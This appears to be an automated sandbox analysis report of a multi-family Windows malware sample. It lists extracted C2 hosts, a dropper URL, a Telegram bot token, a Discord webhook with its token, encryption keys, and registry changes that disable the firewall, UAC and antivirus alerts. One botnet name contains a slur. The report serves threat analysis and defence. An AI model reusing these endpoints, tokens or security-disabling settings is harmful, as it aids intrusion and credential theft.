amadey | 07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a

Analysis

max time kernel
10s
max time network
152s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
26/03/2025, 02:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
Size

74.9MB
MD5

c7043b9b65e252b5305634da4f5515f1
SHA1

129a58d2c6c4de7fcead562f9729a28e517fb6d4
SHA256

07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a
SHA512

cdc28eb03dcf533d19e74d7bd86962905486902c5556c448bbf0daa69be705dc1f18c7ea2c41ba8568a1910efb711edaa259a02d35108474e412b8044b719575
SSDEEP

1572864:Z6x3bF0F9U7b7ewHkli+ouzl1IBMrGZHdk/6eSDFb:UBF0Fsb7ewHkliN4km+91xb

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

sharpstealer

https://api.telegram.org/bot7057429288:AAHYl5_27YU1Yjmuj33WKOqLVSgYtq3n-8k/getUpdates

Extracted

Family

silverrat

Version

1.0.0.0

clear-spice.gl.at.ply.gg:62042

Mutex

SilverMutex_ZtRAjMMKxS

Attributes

certificate
MIIE4DCCAsigAwIBAgIQAKQYOfZd86J2BfNjhG4CWTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZTaWx2ZXIwIBcNMjIwODI2MTkwMTA4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlNpbHZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPbpOWfhZTuOfEaqqImTTe5dNHAAry7/mf00DCoI4lPZfypsc1tYraxSPFeayGu09a3qdhkWKSVIgwnu2n4GLQNOCY9fh/1oyrX4Iir3BIkYeU7pKTWgjhUlAmFAUAaNr0ca23Ku2kN79jrDzRznOgE2DEW4p7OiM4Mb097ma9lzu7MyssHbY4VCteAhj9HZiplqBxaC1vXDmzxqG+gUZ1aLcyG7ssdkOjtWVBgT3gD/gOl7KchRzCFB1egDC/vD9WZCG35U3Ngi+IkTznoXR1R06cq4v0UnGjE37R2vcB21qb0ZYNiZJXZHv5i9+R7xoPeNoLda5PqnfGGbhPvNEdD56mdcOKlzGIuyemLkUo8texdpiBWKbtc3JZf5VsKxjJtHDK3xW6gDGI+PAirzGkFPmwcf8WgsblvzLg8OZpVxVs8rmKWoi6qIrf4CXnyl73J4lgzW+ir7PjANAQXwLNGdNnvdMeLeo/muGQPdeNpr6OczGGnkWA4qniHeL51/Gx0a8A+jP9zKiyu+qHcsP2IotgWDH/KlzJVr7IAum+DV92uV8poTDcUNcHaKvhHA65KmEtsvLbK6lFZcAMC0eWC0VgpW44T1/16rOaaky5mP6rTMc3nSyOl/lU/XgAgGGQPe22bRLWYzd3WVeEpI1WnHYXS+tL9IOe4kJP+pYsWDAgMBAAGjMjAwMB0GA1UdDgQWBBR32TJj2LeUx9L+RcSOvmFV6VJq6TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+qucSOi7ov7Q1FmAjMf925KuvKuCNwJiu3Sqo3FDGVAD1fAwAi2FdyuXEO2VIUPZCkalFcBna5rqyrc6tcS4T0IL2TsYLrsuGir7PWP7CAcft1urYS1HpNpHxeH/nixwnQaQs/MuRmdm2TeCj6G21P5BTW55U5y9sMPSYwhbD2N7XLgnSQd5Y+80TR7FUiye/k3D37fI9PRhSQGbfYFRQQTmxj84dPTnY5CVgaY9d8fNiFZkyjaZdf+mibK0xQTf+xLVVj+toDNCkc1F462TdmFhCrHd4PoMo0yLDNv4SC6NLRq4haWDRtORw6gd5GYIoCQ3m3oQvNlNxXhhIjsOyxkxOrkCD0c+57PIc7EmKXieJa/XxnkcIVxO8dvTY/vijuz/VaZYl/lPu9ckuqgJ1wRvvsHl70Trv4Mn4X5uCIqRFFlK/mSOZbLIguGkDN3QIZABvej89vlZMhrVfZOG2oawe23FskHjv7thF/WzOXtWw6RUVC1V+hCwbuxFNUjZmmOTUwdXHnus7I2AuiG6Jz1+y9aYiXBcVTdSljxjHRRmiRaAnY94h58vN8NJ4hKL2GVCo6LxkpuplmcntJN0cKraKTPxSXcCRrqWxX9qoIbfvBcUU4vH1jPJCCLNCuDyD3lgQkpPVvq0EMU1a2HFGgMEQMjpYpb38rcadDhT5ag==
decrypted_key
-|S.S.S|-
discord
https://discord.com/api/webhooks/1335733715820609557/QV6ZUiJPFo3MXmoiKBB-WTBlkHeBiFxmRY95RN_M1sHhPMswAoo2T6AL_kHvoSoCRKE0
key
yy6zDjAUmbB09pKvo5Hhug==
key_x509
dFRzdEVvbU9ZVUR2UmVzZFlPR3V3dlRGWURZdk9S
payload_url
https://g.top4top.io/p_2522c7w8u1.png
reconnect_delay
2
server_signature
PtC8aQAwsdmyktc6Q/l3u9a8oFTj+Ey3VIlIKXe9bX2WiEn7hNPQ0tkMLi1qQ4IBmCWOFTRIVHi2GG5zTxUlAwkitK3X3bWdHiwrf6PqZ7NdmPsSKZym4q+nKXH4df40wtjNvJ2x2m8OSi5jsVvT64/UsmRfIZbFTRp63PCTQ6lN+EL6OoW+dMidok+JH6T8pG21/HyoeykN9muipEqdoixkTFitX6aUocvGy6VZCs7eSxoXtzmYQ3tBukBHuIZAivbVLiF2aDkkpSX6763SGMYUbfASkQ/ihv1elb+XOoqprP3V4GqcllwfGzlk+8/rQD8C3cwLiQEtXgKHbyYWrNcSvis5fYgRcEDvlk2ZkbE8VQE6aNc+VN0TZNW3ldvE+h62kKCYoOb7oJDwiw86IudT01xe9YetmDuCvOIBZqGoXj0h68jOIklH4g22Fx8pOaIisv01vdSoawFzoOQNfgfZeRgjvV6QJHQiYuodn+FWlPwYxQ7FzUJy3is8d0VoJr6rG2BeEn99pW/LO+SsCfPIGZvs7oA/oEsn2BBkGVhlko0IZCxd30q3HIEIwdagGJgHVtnC5C2yMsmjV3geQMUCdRsAJEuCEVqAkTr7QQNJoSCok8jOYoOeJxzwbNzAMySliCDNoGYhhU/jnfhJKsqo355RYtvKROehEYZ0Srg=

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

dropout-37757.portmap.host:55554

dropout-37757.portmap.host:37757

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

quasar

Version

1.3.0.0

Botnet

nigga

niggahunter-28633.portmap.io:28633

Mutex

QSR_MUTEX_m0fef2zik6JZzavCsv

Attributes

encryption_key
E3KUWr7JQZqCWN4hstks
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Runtime Broker
subdirectory
SubDir

Extracted

Family

lumma

https://t5impactsupport.world/api

https://nestlecompany.world/api

https://mercharena.biz/api

https://stormlegue.com/api

https://blast-hubs.com/api

https://blastikcn.com/api

https://lestagames.world/api

Extracted

Family

asyncrat

Version

0.5.6B

Botnet

null

rootedkrypto-29674.portmap.host:29674

Mutex

jsmjjhooulqefd

Attributes

delay
5
install
true
install_file
Minecraft.exe
install_folder
%AppData%

aes.plain

Extracted

Family

crimsonrat

185.136.161.124

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

142.147.96.74:7000

buinhatduy01.ddns.net:7000

buinhatduy.duckdns.org:7000

Mutex

GrvSx1c72DJvLvKa

Attributes

Install_directory
%AppData%
install_file
AggregatorHost.exe

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

March-25

chongmei33.publicvm.com:2703

chongmei33.publicvm.com:7031

umarmira055.duckdns.org:2703

umarmira055.duckdns.org:7031

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
true
install_file
WindowsUpdate.exe
install_folder
%Temp%

aes.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

CrimsonRAT main payload 1 IoCs

resource	yara_rule
behavioral1/files/0x000500000001a4b8-779.dat	family_crimsonrat

CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
rat crimsonrat
Crimsonrat family
crimsonrat
Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
trojan banker danabot
Danabot family
danabot

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral1/memory/5400-6064-0x00000000008C0000-0x00000000008D6000-memory.dmp	family_xworm
behavioral1/memory/4260-6089-0x00000000011C0000-0x00000000011D0000-memory.dmp	family_xworm
behavioral1/files/0x0003000000013d08-10044.dat	family_xworm
behavioral1/files/0x000500000001cbe7-10047.dat	family_xworm

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

Modifies firewall policy service 3 TTPs 3 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	LoveForyou.scr
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"	LoveForyou.scr
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1"	LoveForyou.scr

Modiloader family
modiloader
Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Phemedrone family
phemedrone
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 4 IoCs

resource	yara_rule
behavioral1/files/0x0005000000019266-241.dat	family_quasar
behavioral1/memory/2828-246-0x0000000001350000-0x00000000013AE000-memory.dmp	family_quasar
behavioral1/memory/912-4306-0x0000000000BA0000-0x0000000000BFE000-memory.dmp	family_quasar
behavioral1/files/0x000700000001cb39-10523.dat	family_quasar

Sharp Stealer
Sharp Stealer is an infostealer first observed in 2024, based on Echelon and Umbral stealers.
stealer sharpstealer
Sharpstealer family
sharpstealer
SilverRat
SilverRat is trojan written in C#.
trojan silverrat
Silverrat family
silverrat

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3040 created 492	3040	psychosomatic.RAT.exe	7

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	LoveForyou.scr

Windows security bypass 2 TTPs 6 IoCs

defense_evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	LoveForyou.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	LoveForyou.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	LoveForyou.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1"	LoveForyou.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	LoveForyou.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	LoveForyou.scr

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

ModiLoader First Stage 3 IoCs

resource	yara_rule
behavioral1/memory/1792-797-0x000000000C320000-0x000000000C579000-memory.dmp	modiloader_stage1
behavioral1/memory/1792-792-0x000000000C320000-0x000000000C579000-memory.dmp	modiloader_stage1
behavioral1/memory/992-5408-0x0000000005E40000-0x0000000005F41000-memory.dmp	modiloader_stage1

Blocklisted process makes network request 1 IoCs

flow	pid	Process
13	2760	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 29 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4636	powershell.exe
7948	powershell.exe
3640	powershell.exe
7804	powershell.exe
8284	powershell.exe
6756	powershell.exe
3636	powershell.exe
4736	powershell.exe
7216	powershell.exe
7484	powershell.exe
7880	powershell.exe
4784	powershell.exe
4144	powershell.exe
3876	powershell.exe
3068	powershell.exe
8480	powershell.exe
8144	powershell.exe
7552	powershell.exe
7192	powershell.exe
8488	powershell.exe
4828	powershell.exe
8892	powershell.exe
7228	powershell.exe
9100	powershell.exe
3576	powershell.exe
5892	powershell.exe
4004	powershell.exe
8348	powershell.exe
8592	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
6136	takeown.exe
8412	icacls.exe
9136	takeown.exe
9112	icacls.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5560	attrib.exe
3592	attrib.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
8220	chrome.exe
6540	chrome.exe
5688	chrome.exe
7400	chrome.exe
2152	chrome.exe
6940	chrome.exe
6868	chrome.exe
8084	chrome.exe

Executes dropped EXE 41 IoCs

pid	Process
2084	_[MyFamilyPies]Avi.exe
2212	0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
2660	0a-PORNOSKI.exe
2564	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
2996	svchost.exe
616	proxyt.exe
1028	1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe
2016	5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe
1488	783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe
808	Discord Nitro Generator and Checker.exe
1964	DanaBot.exe
896	2020.exe
2864	2020.exe
2124	2020.exe
988	2020.exe
1864	DevilRAT.exe
2716	2020.exe
2936	0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe
2316	goofy.exe
3040	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2956	FutureClient.exe
2828	nigga.exe
1704	AgentTesla.exe
484	amadey.exe
1788	EliteMonitor.exe
864	EliteMonitor.exe
2744	RuntimeBroker.exe
1492	CrimsonRAT.exe
2876	RuntimeBroker.exe
2384	Backdoor.Win32.Rbot.aal.exe
1820	cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
2944	DISCORD BIRTHDAY NITRO CLAIMER.exe
2632	Discord Free Nitros.exe
2080	DISCORD BIRTHDAY NITRO CLAIMER.exe
1252	Discord Nitro Checker by Unheilgott (1).exe
1244	cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
1600	bween.exe
992	LoveForyou.scr
3756	Installer.exe
2804	Lokibot.exe

Loads dropped DLL 64 IoCs

pid	Process
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
2564	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
2564	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
2564	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
2564	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
896	2020.exe
896	2020.exe
896	2020.exe
896	2020.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
3040	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1208	Explorer.EXE
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1788	EliteMonitor.exe
2744	RuntimeBroker.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
2376	WerFault.exe
2376	WerFault.exe
1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
2944	DISCORD BIRTHDAY NITRO CLAIMER.exe
1384	regsvr32.exe
2080	DISCORD BIRTHDAY NITRO CLAIMER.exe
2080	DISCORD BIRTHDAY NITRO CLAIMER.exe
2080	DISCORD BIRTHDAY NITRO CLAIMER.exe
2080	DISCORD BIRTHDAY NITRO CLAIMER.exe
900	conhost.exe
2080	DISCORD BIRTHDAY NITRO CLAIMER.exe
2080	DISCORD BIRTHDAY NITRO CLAIMER.exe
2080	DISCORD BIRTHDAY NITRO CLAIMER.exe
2080	DISCORD BIRTHDAY NITRO CLAIMER.exe
2080	DISCORD BIRTHDAY NITRO CLAIMER.exe
2080	DISCORD BIRTHDAY NITRO CLAIMER.exe
2760	rundll32.exe
2760	rundll32.exe
2760	rundll32.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
6136	takeown.exe
8412	icacls.exe
9136	takeown.exe
9112	icacls.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/memory/2804-727-0x0000000000440000-0x0000000000454000-memory.dmp	agile_net

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/4956-6014-0x0000000000400000-0x0000000000CF2000-memory.dmp	themida
behavioral1/memory/4956-6015-0x0000000000400000-0x0000000000CF2000-memory.dmp	themida
behavioral1/memory/4956-6195-0x0000000000400000-0x0000000000CF2000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x00050000000194df-447.dat	vmprotect
behavioral1/memory/1252-704-0x00000000011A0000-0x0000000001242000-memory.dmp	vmprotect

Windows security modification 2 TTPs 7 IoCs

defense_evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	LoveForyou.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	LoveForyou.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	LoveForyou.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1"	LoveForyou.scr
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\Svc	LoveForyou.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	LoveForyou.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	LoveForyou.scr

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	DevilRAT.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	DevilRAT.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	DevilRAT.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek¸ßÇåÎúÒôÆµ¹ÜÀíÆ÷ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\jCMCgXiSHJ = "C:\\Users\\Admin\\AppData\\Roaming\\qEMFsTeRPC\\cGEDpDSLzj.exe"	2020.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTWRM = "C:\\Users\\Admin\\dane\\0a-PORNOSKI.exe"	0a-PORNOSKI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\SVRNT = "C:\\Users\\Admin\\dane\\smss.exe"	0a-PORNOSKI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Installer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Installer.exe"	_[MyFamilyPies]Avi.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	LoveForyou.scr

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
25	discord.com
28	discord.com
62	raw.githubusercontent.com
63	raw.githubusercontent.com
134	discord.com
389	5.tcp.ngrok.io
46	discord.com
61	raw.githubusercontent.com
181	5.tcp.ngrok.io

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
178	ip-api.com
228	ip-api.com
17	api.ipify.org
19	api.ipify.org
27	ip-api.com
70	whatismyipaddress.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0007000000019a62-6850.dat	autoit_exe
behavioral1/files/0x000500000001cd65-11411.dat	autoit_exe

Drops autorun.inf file 1 TTPs 18 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	D:\autorun.inf	0a-PORNOSKI.exe
File opened for modification	\??\Z:\autorun.inf	0a-PORNOSKI.exe
File created	\??\Y:\autorun.inf	0a-PORNOSKI.exe
File created	\??\E:\autorun.inf	0a-PORNOSKI.exe
File opened for modification	F:\autorun.inf	0a-PORNOSKI.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\autorun.inf	0a-PORNOSKI.exe
File created	C:\Users\Admin\dane\autorun.inf	0a-PORNOSKI.exe
File opened for modification	C:\Users\Admin\dane\autorun.inf	0a-PORNOSKI.exe
File opened for modification	C:\autorun.inf	0a-PORNOSKI.exe
File opened for modification	\??\E:\autorun.inf	0a-PORNOSKI.exe
File created	C:\Users\Admin\AppData\Local\Temp\autorun.inf	0a-PORNOSKI.exe
File created	F:\autorun.inf	0a-PORNOSKI.exe
File created	\??\G:\autorun.inf	0a-PORNOSKI.exe
File created	\??\Z:\autorun.inf	0a-PORNOSKI.exe
File opened for modification	\??\Y:\autorun.inf	0a-PORNOSKI.exe
File opened for modification	\??\G:\autorun.inf	0a-PORNOSKI.exe
File created	C:\autorun.inf	0a-PORNOSKI.exe
File created	D:\autorun.inf	0a-PORNOSKI.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\d3dx9_43.dll	psychosomatic.RAT.exe
File created	C:\Windows\System32\LogonUI.exe	psychosomatic.RAT.exe
File opened for modification	C:\Windows\System32\LogonUI.exe	psychosomatic.RAT.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 896 set thread context of 988	896	2020.exe	49
PID 2744 set thread context of 2876	2744	RuntimeBroker.exe	66

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1792-44-0x0000000006BB0000-0x0000000006BC8000-memory.dmp	upx
behavioral1/files/0x0008000000016c62-47.dat	upx
behavioral1/files/0x00060000000173fc-65.dat	upx
behavioral1/memory/2564-66-0x0000000001E90000-0x0000000001EBE000-memory.dmp	upx
behavioral1/memory/2564-72-0x0000000000400000-0x0000000000418000-memory.dmp	upx
behavioral1/memory/616-80-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/4092-748-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/5020-5394-0x0000000000400000-0x000000000040B000-memory.dmp	upx
behavioral1/memory/616-5670-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/5020-5956-0x0000000000400000-0x000000000040B000-memory.dmp	upx
behavioral1/memory/468-6139-0x0000000000400000-0x000000000043C000-memory.dmp	upx
behavioral1/memory/468-6487-0x0000000000400000-0x000000000043C000-memory.dmp	upx
behavioral1/memory/2060-6656-0x0000000000400000-0x000000000040B000-memory.dmp	upx
behavioral1/memory/5020-6709-0x0000000000400000-0x000000000040B000-memory.dmp	upx
behavioral1/files/0x0003000000012037-10197.dat	upx
behavioral1/files/0x000600000001cc9f-10724.dat	upx

Drops file in Program Files directory 12 IoCs

description	ioc	Process
